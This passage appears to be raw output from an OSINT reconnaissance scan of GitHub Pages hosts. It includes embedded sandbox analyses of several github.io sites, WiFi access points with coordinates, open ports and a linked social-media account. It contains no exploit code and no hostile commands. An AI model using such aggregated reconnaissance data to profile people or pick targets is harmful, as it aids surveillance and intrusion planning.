"IsoScope_dd4_ConnHashTable<3540>_HashTable_Mutex"\n "IsoScope_dd4_IE_EarlyTabStart_0xc74_Mutex"\n "IsoScope_dd4_IESQMMUTEX_0_331"\n "IsoScope_dd4_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3540"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': 
u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:80"\n "185.199.111.153:443"\n "104.18.23.52:443"\n "142.250.191.74:443"\n "142.250.189.163:443"\n "45.57.91.1:443"\n "172.64.100.10:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"klliii.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.nflxext.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "ka-f.fontawesome.com"\n "kit.fontawesome.com"\n "klliii.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"backgroun-img_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio 
density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "children_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "everywhere_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "download_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3" and extension "jpg"\n "Logonetflix_1_.png" has type "PNG image data 2226 x 678 8-bit/color RGBA non-interlaced" and extension "png"\n "enjoy_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "free-fa-solid-900_1_.ttf" has type "TrueType Font data 10 tables 1st "OS/2" 22 names Macintosh"- [targetUID: N/A]\n "backgroun-img_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "children_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "o-0NIpQlx3QUlC5A4PNjThZlYA_1_.woff" has type "Web Open Font Format TrueType length 228112 version 1.1"- [targetUID: N/A]\n "o-0IIpQlx3QUlC5A4PNb4Q_1_.woff" has type "Web Open Font Format TrueType length 224624 version 1.1"- [targetUID: N/A]\n "everywhere_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "free.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "free-fa-regular-400_1_.ttf" has type "TrueType Font data 10 
tables 1st "OS/2" 22 names Macintosh"- [targetUID: N/A]\n "download_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3"- [targetUID: N/A]\n "Logonetflix_1_.png" has type "PNG image data 2226 x 678 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "free-v4-shims.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003540]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF3E012FF382512C9A.TMP" has type "data"- Location: [%TEMP%\\~DF3E012FF382512C9A.TMP]- [targetUID: 00000000-00003540]\n "~DFDA4F25623C99390F.TMP" has type "data"- Location: [%TEMP%\\~DFDA4F25623C99390F.TMP]- [targetUID: 00000000-00003540]\n "~DF8521FB640F54F2EE.TMP" has type "data"- Location: [%TEMP%\\~DF8521FB640F54F2EE.TMP]- [targetUID: 00000000-00003540]\n "~DF8123E484044DA9B7.TMP" has type "data"- Location: [%TEMP%\\~DF8123E484044DA9B7.TMP]- [targetUID: 00000000-00003540]\n "style_1_.css" has type "assembler source ASCII text"- [targetUID: N/A]\n "enjoy_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced"- [targetUID: N/A]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-556', u'name': u'Found strings related to keylogger', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1056/001', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-568', u'attck_id': u'T1056.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "< >"; File: "SSL")'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-62', u'name': u'Communicates with HTTP webserver (GET/POST 
requests)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Found http requests in header "GET /clone-netflix/"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://klliii.github.io/clone-netflix/"\n Pattern match: "http://klliii.github.io"\n Pattern match: "http://klliii.github.io/clone-netflix"\n Pattern match: "SUIDMmicrosoft.com/9216324768204831030537213959591431030420*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=202201"\n Pattern match: "SUIDMmicrosoft.com/9216324768204831030537213959591431030420*MUID27A7234A5F97654400D0304F5EDB649Amicrosoft.com/1025338017126431108891213975216431030420*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA6"\n Pattern match: "https://assets.nflxext.com/ffe/siteui/acquisition/ourStory/fuji/desktop/video-tv-in-0819.m4v"\n Pattern match: "https://assets.nflxext.com/ffe/siteui/acquisition/ourStory/fuji/desktop/video-devices-in.m4v"\n Pattern match: "https://kit.fontawesome.com/e5b8e6f1e4.js"\n Pattern match: "SUIDMmicrosoft.com/9216324768204831030537213959591431030420*MUID27A7234A5F97654400D0304F5EDB649Amicrosoft.com/1025338017126431108891213975216431030420*_EDGE_V1microsoft.com/9216338017126431108891213990841431030420*SRCHDAF=NOFORMmicrosoft.com/10243323789440"\n Pattern match: "https://fontawesome.com"\n Pattern match: 
"https://fontawesome.com/license/free"\n Pattern match: "MUIDB27A7234A5F97654400D0304F5EDB649Aieonline.microsoft.com/9216338017126431108891213975216431030420*"\n Pattern match: "https://fonts.gstatic.com/s/notosans/v28/o-0NIpQlx3QUlC5A4PNjThZlYA.woff"\n Pattern match: "https://fonts.gstatic.com/s/notosans/v28/o-0IIpQlx3QUlC5A4PNb4Q.woff"\n Pattern match: "https://fonts.gstatic.com/s/notosanssylotinagri/v2 | 185.199.111.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BBHWIRELESS (Net ID: 00:00:C5:D7:5E:5C) | 41.8781, -87.6298 |
| 2023-05-12 03:09:39 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 109.48.229.35.bc.googleusercontent.com | 35.229.48.109 |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00theway.github.io | 185.199.111.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CHILDERS (Net ID: 00:09:5B:70:17:F2) | 39.0469, -77.4903 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | PDI (Net ID: 00:06:25:FE:34:4D) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | venia1101 5 (Net ID: 00:01:9F:34:7C:24) | 34.0544, -118.244 |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:443 | 104.21.71.14 |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.203): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:46:54 | Affiliate - Domain Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cloudflare.net | route1.mx.cloudflare.net |
| 2023-05-12 03:09:28 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | acilacikveteriner.com | 87.248.157.102 |
| 2023-05-12 02:54:54 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c552e7289ff8729-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 2a06:98c1:3121::1 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Snapchat Stories (Category: social); https://story.snapchat.com/s/ayshoo | ayshoo |
| 2023-05-12 02:44:24 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Cloudflare | oldfluid.battleb0t.xyz |
| 2023-05-12 02:44:14 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app | pics.battleb0t.xyz |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:2096 | 188.114.97.1 |
| 2023-05-12 02:46:12 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 17, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://aegide.github.io/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7968:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7968:120:WilError_01"\n "Local\\SM0:8132:120:WilError_01"\n "Local\\SM0:8132:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:8132:120:WilError_01"\n "Local\\SM0:7968:120:WilError_01"\n "SM0:7968:120:WilError_01"\n "SM0:7968:304:WilStaging_02"\n "Local\\SM0:7968:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7968:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7968:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "172.217.164.106:443"\n "142.251.32.42:443"\n "142.251.214.131:443"\n "104.46.162.226:443"\n "199.232.208.194:443"\n "74.120.184.204:443"\n "151.101.2.91:443"\n "142.250.191.46:443"\n "18.155.181.126:443"\n 
"142.251.2.155:443"\n "192.184.69.215:443"\n "151.101.128.194:443"\n "172.217.12.104:443"\n "50.112.153.84:443"\n "104.22.4.69:443"\n "108.138.240.127:443"\n "18.155.181.48:443"\n "23.39.0.192:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"a.ad.gt"\n "ads.servenobid.com"\n "api.rlcdn.com"\n "d.turn.com"\n "eb2.3lift.com"\n "hbopenbid.pubmatic.com"\n "id.hadron.ad.gt"\n "idsync.rlcdn.com"\n "idx.liadm.com"\n "image2.pubmatic.com"\n "image8.pubmatic.com"\n "infinitefusion.fandom.com"\n "lexicon.33across.com"\n "p.ad.gt"\n "pippio.com"\n "pixel.tapad.com"\n "prebid-server.rubiconproject.com"\n "prebid.media.net"\n "rp.liadm.com"\n "s.amazon-adsystem.com"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007968]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.24\\Ruleset Data]- [targetUID: 00000000-00007968]\n "recovery-component-inner.crx" has type "Google Chrome extension version 3"- Location: [%TEMP%\\7968_773401145\\recovery-component-inner.crx]- [targetUID: 00000000-00007968]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\7968_1915048979\\Filtering Rules]- [targetUID: 00000000-00007968]\n "data_2" has 
type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\GPUCache\\data_2]- [targetUID: 00000000-00007968]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\GPUCache\\data_1]- [targetUID: 00000000-00007968]\n "59f9f8c0-2fcb-48a3-9c43-382eb668ab90.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 480998"- Location: [%TEMP%\\59f9f8c0-2fcb-48a3-9c43-382eb668ab90.tmp]- [targetUID: 00000000-00007968]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\7968_1915048979\\Filtering Rules-AA]- [targetUID: 00000000-00007968]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00007968]\n "f_000241" has type "gzip compressed data from Unix original size modulo 2^32 559102"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000241]- [targetUID: 00000000-00008172]\n "f_000254" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 558245"- [targetUID: N/A]\n "History" has type "SQLite 3.x database last written using SQLite version 3038005"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History]- [targetUID: 00000000-00008132]\n "f_000259" has type "gzip compressed data max compression original size modulo 2^32 406249"- [targetUID: N/A]\n "Visited Links" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Visited Links]- [targetUID: 00000000-00007968]\n "f_000248" has type "gzip compressed data was "main.bundle.js" last modified: Wed Mar 29 09:20:53 2023 max compression from Unix original size modulo 2^32 631835"- [targetUID: N/A]\n "f_00024d" has type "gzip compressed data max compression from Unix original size modulo 2^32 360702"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00024d]- [targetUID: 
00000000-00008172]\n "f_000242" has type "gzip compressed data max compression from Unix original size modulo 2^32 494696"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000242]- [targetUID: 00000000-00008172]\n "f_000252" has type "data"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://aegide.github.io/"\n Pattern match: "https://aegide.github.io"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://github.com/easylist"\n Pattern match: "https://easylist.to/"\n Pattern match: "https://creativecommons.org/compatiblelicenses"\n Pattern match: "https://creativecommons.org/"\n Heuristic match: "a.ad.gt"\n Heuristic match: "ads.servenobid.com"\n Heuristic match: "api.rlcdn.com"\n Heuristic match: "d.turn.com"\n Heuristic match: "eb2.3lift.com"\n Heuristic match: "hbopenbid.pubmatic.com"\n Heuristic match: "id.hadron.ad.gt"\n Heuristic match: "idsync.rlcdn.com"\n Heuristic match: "idx.liadm.com"\n Heuristic match: "image2.pubmatic.com"\n Heuristic match: "image8.pubmatic.com"\n Heuristic match: "infinitefusion.fandom.com"\n Heuristic match: "lexicon.33across.com"\n Heuristic match: "p.ad.gt"\n Heuristic match: "pippio.com"\n Heuristic match: "pixel.tapad.com"\n Heuristic match: "prebid-server.rubiconproject.com"\n Heuristic match: "prebid.media.net"\n Heuristic match: "rp.liadm.com"\n Heuristic match: "s.amazon-adsystem.com"\n Heuristic match: "secure.adnxs.com"\n Heuristic match: "seg.ad.gt"\n Heuristic match: 
"services.fandom.com"\n Heuristic match: "sync.mathtag.com"\n Heuristic match: "token.rubiconproject.com"\n Pattern match: "www.fandom.com"\n Pattern match: "on.fandom.com/\'.\',\'\'ki/F_,k;;l__"\n Heuristic match: "egide.github.io"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-5', u'name': u'Sends UDP traffic', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 1, u'type': 7, u'description': u'"UDP connection to 142.250.191.46"\n "UDP connection to 172.217.12.104"\n "UDP connection to 35.190.60.146"\n "UDP connection to 34.111.113.62"\n "UDP connection to 34.98.64.218"\n "UDP connection to 142.250.189.162"\n "UDP connection to 142.250.189.226"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- [targetUID: N/A]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': 
u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'type': 8, u'description': u'"adblock_snippet.js" has type "Unknown"- Location: [%TEMP%\\7968_1915048979\\adblock_snippet.js]- [targetUID: 00000000-00007968]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'str | 185.199.111.153 |
| 2023-05-12 02:49:42 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://ovolve.github.io./', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:80"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_c04_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_c04_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_c04_IE_EarlyTabStart_0xc28_Mutex"\n "IsoScope_c04_ConnHashTable<3076>_HashTable_Mutex"\n "IsoScope_c04_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3076"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c04_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': 
u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ovolve.github.io"\n "ovolve.github.io."'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ovolve.github.io."'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "_E26CC892-B3FD-11ED-8DD4-080027C97B4D_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DFC2B4CC769FA8ED96.TMP" has type "data"- Location: [%TEMP%\\~DFC2B4CC769FA8ED96.TMP]- [targetUID: 00000000-00003076]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot 
read section info"- [targetUID: N/A]\n "RecoveryStore._DBBF5281-B3FD-11ED-8DD4-080027C97B4D_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003076]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DFA990EBDE4D7AD6EC.TMP" has type "data"- Location: [%TEMP%\\~DFA990EBDE4D7AD6EC.TMP]- [targetUID: 00000000-00003076]\n "~DF2782969D76362D05.TMP" has type "data"- Location: [%TEMP%\\~DF2782969D76362D05.TMP]- [targetUID: 00000000-00003076]\n "DD371DTO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DD371DTO.txt]- [targetUID: 00000000-00003076]\n "~DF871B8F3038523BC2.TMP" has type "data"- Location: [%TEMP%\\~DF871B8F3038523BC2.TMP]- [targetUID: 00000000-00003076]\n "_DBBF5283-B3FD-11ED-8DD4-080027C97B4D_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "2JR14FFJ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2JR14FFJ.txt]- [targetUID: 00000000-00003076]\n "ZPAGZOOJ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZPAGZOOJ.txt]- [targetUID: 00000000-00003912]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://ovolve.github.io./"\n Pattern match: "http://ovolve.github.io"\n Heuristic match: "ovolve.github.io"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample 
